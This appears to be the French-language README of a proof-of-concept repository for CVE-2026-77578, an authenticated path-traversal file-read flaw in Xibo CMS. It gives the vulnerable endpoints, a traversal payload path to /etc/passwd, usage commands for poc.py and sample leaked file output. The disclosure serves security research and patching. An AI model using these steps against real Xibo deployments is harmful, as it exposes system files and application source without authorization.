
Preuve de concept en Python exploitant CVE-2026-77578, une traversée de chemin authentifiée dans Xibo CMS qui lit des fichiers locaux arbitraires via des imports de modèles XML spécialement conçus.
CVE-2026-77578 est une vulnérabilité de lecture arbitraire de fichiers locaux authentifiée dans Xibo CMS.
Un utilisateur authentifié disposant de privilèges Admin ou d'un accès aux Modèles de modules peut importer un modèle XML conçu contenant un asset basé sur un chemin avec une séquence de traversée. L'asset résultant peut ensuite être accédé via le point de terminaison d'asset du module, ce qui amène Xibo à renvoyer le contenu du fichier local référencé.
<= 4.4.3>= 4.4.4AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)Xibo a publié la vulnérabilité sous la référence GHSA-pc3g-2hhm-46qc, confirmant que les versions <= 4.4.3 sont affectées et que les versions >= 4.4.4 sont corrigées. L'avis attribue une sévérité Élevée avec un score CVSS v3.1 de 8.8 et identifie CVE-2026-77578.
Le PoC Python fourni automatise le processus d'exploitation :
/developer/template/import./module/asset/<asset-id>.python3 poc.py <URL> -u <USERNAME> -p <PASSWORD> -f <FILE>
Exemple :
python3 poc.py http://localhost \
-u xibo_admin \
-p password \
-f /etc/passwd
Autre exemple :
python3 poc.py http://localhost \
-u xibo_admin \
-p password \
-f /etc/os-release
L'option -f a pour valeur par défaut /etc/passwd.
Ce qui suit démontre la récupération réussie de /etc/passwd :
==============================================
FILE CONTENT
==============================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Authenticated User
|
v
GET /developer/template/view
|
v
Extract X-XSRF-TOKEN
|
v
POST /developer/template/import
|
| Crafted XML
| path="../../../../../etc/passwd"
v
Xibo creates the asset
|
v
GET /module/asset/<asset-id>
|
v
Contents of local file returned
La vulnérabilité a été validée avec succès sur plusieurs fichiers dans un environnement de test local Xibo CMS 4.4.3, notamment :
/etc/passwd/etc/hosts/etc/os-release/var/www/cms/web/index.phpLe test sur le fichier source PHP démontre que le problème est capable de renvoyer le code source de l'application, et pas seulement des métadonnées système.
Une exploitation réussie permet à un attaquant authentifié disposant des privilèges requis sur les Modèles de modules de lire des fichiers arbitraires accessibles au processus de l'application Xibo.
Selon le déploiement, cela peut exposer :
Cette preuve de concept est fournie à des fins de recherche en sécurité autorisée et de tests défensifs uniquement.
Ne testez que les systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite d'évaluation.
CVE-2026-77578/
├── poc.py
├── README.md
├── LICENSE
├── .gitignore
└── screenshots/
└── poc-output.png